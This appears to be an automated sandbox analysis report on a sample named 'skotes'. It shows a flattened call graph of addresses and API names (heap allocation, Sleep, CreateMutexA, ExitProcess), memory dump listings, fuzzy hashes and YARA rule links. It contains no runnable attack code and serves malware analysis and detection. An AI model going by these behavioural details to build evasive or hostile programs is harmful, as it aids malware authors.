__dosmaperr RtlAllocateHeap 11978->11979 11980 fcaff5 11979->11980 11981 fc6c5a ___std_exception_copy RtlAllocateHeap 11980->11981 11982 fcb000 11981->11982 11982->11962 11984 fcaecc 11983->11984 11985 fcaee1 11983->11985 11986 fc75e3 __dosmaperr RtlAllocateHeap 11984->11986 11987 fcaf2a 11985->11987 11991 fcaf08 11985->11991 11988 fcaed1 11986->11988 11989 fc75e3 __dosmaperr RtlAllocateHeap 11987->11989 11990 fc75f6 __dosmaperr RtlAllocateHeap 11988->11990 11992 fcaf2f 11989->11992 11995 fc678b 11990->11995 12016 fcae2f 11991->12016 11994 fc75f6 __dosmaperr RtlAllocateHeap 11992->11994 11996 fcaf37 11994->11996 11995->11958 11995->11965 11997 fc6c5a ___std_exception_copy RtlAllocateHeap 11996->11997 11997->11995 11999 fd0445 __dosmaperr 11998->11999 12000 fd044d 11999->12000 12001 fd0465 11999->12001 12002 fc75e3 __dosmaperr RtlAllocateHeap 12000->12002 12003 fd0500 12001->12003 12010 fd0497 12001->12010 12004 fd0452 12002->12004 12005 fc75e3 __dosmaperr RtlAllocateHeap 12003->12005 12006 fc75f6 __dosmaperr RtlAllocateHeap 12004->12006 12007 fd0505 12005->12007 12015 fd045a 12006->12015 12008 fc75f6 __dosmaperr RtlAllocateHeap 12007->12008 12009 fd050d 12008->12009 12011 fc6c5a ___std_exception_copy RtlAllocateHeap 12009->12011 12012 fc75f6 __dosmaperr RtlAllocateHeap 12010->12012 12010->12015 12011->12015 12013 fd04be 12012->12013 12014 fc75e3 __dosmaperr RtlAllocateHeap 12013->12014 12014->12015 12015->11971 12017 fcae3b __dosmaperr 12016->12017 12018 fcae7b 12017->12018 12019 fcae70 12017->12019 12021 fc75f6 __dosmaperr RtlAllocateHeap 12018->12021 12023 fcaf48 12019->12023 12022 fcae76 12021->12022 12022->11995 12034 fcc0de 12023->12034 12025 fcaf5e 12030 fc75c0 __dosmaperr RtlAllocateHeap 12025->12030 12032 fcafd8 12025->12032 12026 fcaf58 12026->12025 12027 fcc0de RtlAllocateHeap 12026->12027 12033 fcaf90 12026->12033 12029 fcaf87 12027->12029 12028 fcc0de RtlAllocateHeap 12028->12025 12031 fcc0de RtlAllocateHeap 12029->12031 12030->12032 12031->12033 12032->12022 12033->12025 12033->12028 12035 fcc0eb 12034->12035 12036 fcc100 12034->12036 12037 fc75e3 __dosmaperr RtlAllocateHeap 12035->12037 12039 fc75e3 __dosmaperr RtlAllocateHeap 12036->12039 12041 fcc125 12036->12041 12038 fcc0f0 12037->12038 12040 fc75f6 __dosmaperr RtlAllocateHeap 12038->12040 12042 fcc130 12039->12042 12044 fcc0f8 12040->12044 12041->12026 12043 fc75f6 __dosmaperr RtlAllocateHeap 12042->12043 12045 fcc138 12043->12045 12044->12026 12046 fc6c5a ___std_exception_copy RtlAllocateHeap 12045->12046 12046->12044 12047 f96db5 12048 f96dc2 12047->12048 12049 f96dca 12048->12049 12050 f96df5 12048->12050 12051 fa80c0 RtlAllocateHeap 12049->12051 12052 fa80c0 RtlAllocateHeap 12050->12052 12053 f96deb shared_ptr 12051->12053 12052->12053 12054 f96ec1 shared_ptr 12053->12054 12055 fc6c6a RtlAllocateHeap 12053->12055 12056 f96ee3 12055->12056 12106 f99ba5 12107 f99ba7 12106->12107 12108 fa7a00 RtlAllocateHeap 12107->12108 12109 f99ca9 12108->12109 12110 f95c10 4 API calls 12109->12110 12111 f99cb1 12110->12111 12112 f98b30 4 API calls 12111->12112 12113 f99cc2 12112->12113 12114 fa8220 RtlAllocateHeap 12113->12114 12115 f99cd1 12114->12115 12116 f93f9f 12117 f93fad 12116->12117 12121 f93fc5 12116->12121 12118 f92410 5 API calls 12117->12118 12119 f93fb6 12118->12119 12120 f93ce0 RtlAllocateHeap 12119->12120 12120->12121 12125 f92b90 12126 f92bce 12125->12126 12127 fab7fb TpReleaseWork 12126->12127 12128 f92bdb shared_ptr std::future_error::future_error 12127->12128 12144 f98980 12145 f98aea 12144->12145 12152 f989d8 shared_ptr 12144->12152 12146 fa7a00 RtlAllocateHeap 12146->12152 12147 f95c10 4 API calls 12147->12152 12148 f98b20 12150 fa8200 RtlAllocateHeap 12148->12150 12149 fa80c0 RtlAllocateHeap 12149->12152 12151 f98b25 12150->12151 12153 fc6c6a RtlAllocateHeap 12151->12153 12152->12145 12152->12146 12152->12147 12152->12148 12152->12149 12152->12151 12154 f98b2a 12153->12154 12183 f93970 12184 fac68b __Mtx_init_in_situ 2 API calls 12183->12184 12185 f939a7 12184->12185 12186 fac68b __Mtx_init_in_situ 2 API calls 12185->12186 12187 f939e6 12186->12187 12188 f92170 12193 fac6fc 12188->12193 12191 fad64e RtlAllocateHeap 12192 f92184 12191->12192 12194 fac70c 12193->12194 12195 f9217a 12193->12195 12194->12195 12197 facfbe 12194->12197 12195->12191 12198 faccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12197->12198 12199 facfd0 12198->12199 12199->12194 12200 f93770 12201 f9379b 12200->12201 12202 f937cd shared_ptr 12201->12202 12203 fc6c6a RtlAllocateHeap 12201->12203 12204 f9380f 12203->12204 12205 f95f76 12207 f95f81 shared_ptr 12205->12207 12206 f95ffe shared_ptr std::future_error::future_error 12207->12206 12208 fc6c6a RtlAllocateHeap 12207->12208 12209 f9601b 12208->12209 12210 fa80c0 RtlAllocateHeap 12209->12210 12211 f96089 12210->12211 12212 fa80c0 RtlAllocateHeap 12211->12212 12213 f960bd 12212->12213 12214 fa80c0 RtlAllocateHeap 12213->12214 12215 f960ee 12214->12215 12216 fa80c0 RtlAllocateHeap 12215->12216 12217 f9611f 12216->12217 12218 fa80c0 RtlAllocateHeap 12217->12218 12220 f96150 12218->12220 12219 f965b1 shared_ptr std::future_error::future_error 12220->12219 12221 fc6c6a RtlAllocateHeap 12220->12221 12222 f965dc 12221->12222 12223 fa7a00 RtlAllocateHeap 12222->12223 12224 f966a6 12223->12224 12225 f95c10 4 API calls 12224->12225 12226 f966ac 12225->12226 12227 f95c10 4 API calls 12226->12227 12228 f966b1 12227->12228 12229 f922c0 4 API calls 12228->12229 12230 f966c9 shared_ptr 12229->12230 12231 fa7a00 RtlAllocateHeap 12230->12231 12232 f96732 12231->12232 12233 f95c10 4 API calls 12232->12233 12234 f9673d 12233->12234 12235 f922c0 4 API calls 12234->12235 12242 f96757 shared_ptr 12235->12242 12236 f96852 12237 fa80c0 RtlAllocateHeap 12236->12237 12239 f9689c 12237->12239 12238 fa7a00 RtlAllocateHeap 12238->12242 12240 fa80c0 RtlAllocateHeap 12239->12240 12244 f968e3 shared_ptr std::future_error::future_error 12240->12244 12241 f95c10 4 API calls 12241->12242 12242->12236 12242->12238 12242->12241 12243 f922c0 4 API calls 12242->12243 12243->12242 12288 f9215a 12289 fac6fc InitializeCriticalSectionEx 12288->12289 12290 f92164 12289->12290 12291 fad64e RtlAllocateHeap 12290->12291 12292 f9216e 12291->12292 12293 f9a54d 12295 f9a555 shared_ptr 12293->12295 12294 f9a944 12296 fc6c6a RtlAllocateHeap 12294->12296 12295->12294 12297 f9a628 shared_ptr 12295->12297 12298 f9a949 12296->12298 12301 fa80c0 RtlAllocateHeap 12297->12301 12299 f9a94e 12298->12299 12300 fc6c6a RtlAllocateHeap 12298->12300 12302 f9a953 Sleep CreateMutexA 12299->12302 12303 fc6c6a RtlAllocateHeap 12299->12303 12300->12299 12304 f9a903 12301->12304 12305 f9a98e 12302->12305 12303->12302 12358 f99f44 12359 f99f4c shared_ptr 12358->12359 12360 f9a01f shared_ptr 12359->12360 12361 f9a92b 12359->12361 12365 fa80c0 RtlAllocateHeap 12360->12365 12362 f9a953 Sleep CreateMutexA 12361->12362 12363 fc6c6a RtlAllocateHeap 12361->12363 12364 f9a98e 12362->12364 12363->12362 12366 f9a903 12365->12366 12370 f96535 12372 f96549 shared_ptr 12370->12372 12371 fc6c6a RtlAllocateHeap 12374 f965dc 12371->12374 12372->12371 12373 f965b1 shared_ptr std::future_error::future_error 12372->12373 12375 fa7a00 RtlAllocateHeap 12374->12375 12376 f966a6 12375->12376 12377 f95c10 4 API calls 12376->12377 12378 f966ac 12377->12378 12379 f95c10 4 API calls 12378->12379 12380 f966b1 12379->12380 12381 f922c0 4 API calls 12380->12381 12382 f966c9 shared_ptr 12381->12382 12383 fa7a00 RtlAllocateHeap 12382->12383 12384 f96732 12383->12384 12385 f95c10 4 API calls 12384->12385 12386 f9673d 12385->12386 12387 f922c0 4 API calls 12386->12387 12388 f96757 shared_ptr 12387->12388 12389 f96852 12388->12389 12391 fa7a00 RtlAllocateHeap 12388->12391 12394 f95c10 4 API calls 12388->12394 12395 f922c0 4 API calls 12388->12395 12390 fa80c0 RtlAllocateHeap 12389->12390 12392 f9689c 12390->12392 12391->12388 12393 fa80c0 RtlAllocateHeap 12392->12393 12396 f968e3 shared_ptr std::future_error::future_error 12393->12396 12394->12388 12395->12388 12402 fc6729 12405 fc6672 12402->12405 12404 fc673b 12408 fc667e __dosmaperr 12405->12408 12406 fc6685 12407 fc75f6 __dosmaperr RtlAllocateHeap 12406->12407 12409 fc668a 12407->12409 12408->12406 12410 fc66a5 12408->12410 12411 fc6c5a ___std_exception_copy RtlAllocateHeap 12409->12411 12412 fc66aa 12410->12412 12413 fc66b7 12410->12413 12415 fc6695 12411->12415 12416 fc75f6 __dosmaperr RtlAllocateHeap 12412->12416 12419 fca8c3 12413->12419 12415->12404 12416->12415 12417 fc66c0 12417->12415 12418 fc75f6 __dosmaperr RtlAllocateHeap 12417->12418 12418->12415 12420 fca8cf __dosmaperr 12419->12420 12423 fca967 12420->12423 12422 fca8ea 12422->12417 12424 fca98a 12423->12424 12425 fcd82f __dosmaperr RtlAllocateHeap 12424->12425 12428 fca9d0 12424->12428 12426 fca9eb 12425->12426 12427 fcadf5 __freea RtlAllocateHeap 12426->12427 12427->12428 12428->12422 12434 f94120 12435 f9416a 12434->12435 12436 f941a6 12435->12436 12439 f941f6 12435->12439 12437 f93ee0 4 API calls 12436->12437 12440 f941b2 std::future_error::future_error 12437->12440 12441 fab6be 12439->12441 12442 fab6ca Concurrency::details::_ContextCallback::_CallInContext 12441->12442 12445 fa75a0 12442->12445 12446 fa75ab Concurrency::cancel_current_task std::_Throw_future_error 12445->12446 12447 fac0e9 std::invalid_argument::invalid_argument RtlAllocateHeap 12446->12447 12448 fac1aa std::_Throw_future_error 12447->12448 12484 fa8320 12485 fa8339 12484->12485 12486 fa8f40 RtlAllocateHeap 12485->12486 12487 fa834d 12485->12487 12486->12487 12488 f9211c 12489 f92126 12488->12489 12490 fad64e RtlAllocateHeap 12489->12490 12491 f92132 12490->12491 12495 f92b10 12496 f92b1a 12495->12496 12497 f92b1c 12495->12497 12498 fac26a 5 API calls 12497->12498 12499 f92b22 12498->12499 12500 fa8510 12501 fa855f 12500->12501 12504 fa856c 12500->12504 12506 fa9d00 12501->12506 12503 fa85c4 12504->12503 12527 faa060 12504->12527 12507 fa9e31 12506->12507 12510 fa9d25 12506->12510 12508 fa9270 RtlAllocateHeap 12507->12508 12520 fa9d8b __cftof 12508->12520 12509 fa9e2c 12514 f92480 RtlAllocateHeap 12509->12514 12510->12509 12512 fa9d7a 12510->12512 12513 fa9da1 12510->12513 12511 fc6c6a RtlAllocateHeap 12518 fa9e3b 12511->12518 12512->12509 12515 fa9d85 12512->12515 12517 fad3e2 RtlAllocateHeap 12513->12517 12513->12520 12514->12507 12516 fad3e2 RtlAllocateHeap 12515->12516 12516->12520 12517->12520 12519 fa9e6a shared_ptr 12518->12519 12521 fc6c6a RtlAllocateHeap 12518->12521 12519->12504 12520->12511 12522 fa9dfc shared_ptr __cftof 12520->12522 12523 fa9e8e 12521->12523 12522->12504 12524 fa9ec0 shared_ptr 12523->12524 12525 fc6c6a RtlAllocateHeap 12523->12525 12524->12504 12526 fa9ee6 12525->12526 12528 faa1b1 12527->12528 12531 faa083 12527->12531 12529 fa9270 RtlAllocateHeap 12528->12529 12540 faa0e4 __cftof 12529->12540 12530 fc6c6a RtlAllocateHeap 12539 faa1bb shared_ptr 12530->12539 12532 faa1ac 12531->12532 12534 faa0fd 12531->12534 12535 faa0d3 12531->12535 12533 f92480 RtlAllocateHeap 12532->12533 12533->12528 12538 fad3e2 RtlAllocateHeap 12534->12538 12534->12540 12535->12532 12536 faa0de 12535->12536 12537 fad3e2 RtlAllocateHeap 12536->12537 12537->12540 12538->12540 12539->12504 12540->12530 12541 faa16c shared_ptr __cftof 12540->12541 12541->12504 12542 fad111 12544 fad122 12542->12544 12543 fad12a 12544->12543 12546 fad199 12544->12546 12547 fad1a7 SleepConditionVariableCS 12546->12547 12549 fad1c0 12546->12549 12547->12549 12549->12544 12568 f94300 12569 f9432e 12568->12569 12572 f94359 shared_ptr 12568->12572 12570 fc6c6a RtlAllocateHeap 12569->12570 12569->12572 12571 f943eb 12570->12571

                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                            Function 00FC652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 367 fc652b-fc6538 call fca302 370 fc655a-fc656c call fc656d ExitProcess 367->370 371 fc653a-fc6548 GetPEB 367->371 371->370 373 fc654a-fc6559 371->373 373->370
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32(?,?,00FC652A,?,?,?,?,?,00FC7661), ref: 00FC6567
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2191722151.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191522995.0000000000F90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191722151.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191858509.0000000000FF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191881227.0000000000FFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191927642.0000000001007000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192081416.000000000115C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192103935.000000000115E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001176000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001182000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192181803.000000000118D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192203030.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192228643.000000000119E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192249856.000000000119F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192272763.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192291696.00000000011B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192309743.00000000011B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192329284.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192353043.00000000011BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192372056.00000000011C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192391121.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192410751.00000000011C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192434994.00000000011DE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192454832.00000000011E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192474813.00000000011E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192493129.00000000011EA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192512167.00000000011EB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192531136.00000000011F0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192558914.00000000011F7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192577269.00000000011F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192598157.0000000001206000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192617604.0000000001208000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192638201.000000000120F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192667260.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192685890.0000000001215000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192704268.0000000001218000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192724830.0000000001221000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.0000000001223000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.000000000125D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192804813.0000000001277000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192824766.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192846058.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192864359.000000000128D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192882548.000000000128E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192900314.0000000001293000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192917383.0000000001295000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192936942.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192957004.00000000012A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_f90000_skotes.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1cdf111e335e5870a38df7e077a53470926056fe8cac1d72ccabc382d8356ad8
                                                                                                                                                                                                                                                                            • Instruction ID: 5b78cea75a147eeceff3c1c773de5c8331322f9b7331ba21bab1aaa65c1b983a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1cdf111e335e5870a38df7e077a53470926056fe8cac1d72ccabc382d8356ad8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BFE086345051496FCF25BB15CA1EE483B59EB51755F241C08F9088A226CB25ED51DA40
                                                                                                                                                                                                                                                                            Function 00F99BA5 Relevance: 3.1, APIs: 2, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00F9A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00FF3254), ref: 00F9A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2191722151.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191522995.0000000000F90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191722151.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191858509.0000000000FF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191881227.0000000000FFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191927642.0000000001007000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192081416.000000000115C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192103935.000000000115E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001176000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001182000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192181803.000000000118D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192203030.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192228643.000000000119E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192249856.000000000119F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192272763.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192291696.00000000011B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192309743.00000000011B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192329284.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192353043.00000000011BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192372056.00000000011C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192391121.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192410751.00000000011C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192434994.00000000011DE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192454832.00000000011E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192474813.00000000011E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192493129.00000000011EA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192512167.00000000011EB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192531136.00000000011F0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192558914.00000000011F7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192577269.00000000011F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192598157.0000000001206000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192617604.0000000001208000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192638201.000000000120F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192667260.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192685890.0000000001215000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192704268.0000000001218000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192724830.0000000001221000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.0000000001223000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.000000000125D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192804813.0000000001277000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192824766.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192846058.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192864359.000000000128D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192882548.000000000128E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192900314.0000000001293000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192917383.0000000001295000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192936942.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192957004.00000000012A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_f90000_skotes.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: 90e16d55dfbf58aab95160106d617f9c85627f87a98a5377e798a8aa5ac5c242
                                                                                                                                                                                                                                                                            • Instruction ID: b75bc08c8116bd6f288772535f43590e378c71dd4f806c96266dd1a3511cc979
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90e16d55dfbf58aab95160106d617f9c85627f87a98a5377e798a8aa5ac5c242
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B311871B041448BFF18EB7CDD8976DB762AFC6310F24825CE414973D6C7B98981A751
                                                                                                                                                                                                                                                                            Function 00F99F44 Relevance: 3.1, APIs: 2, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
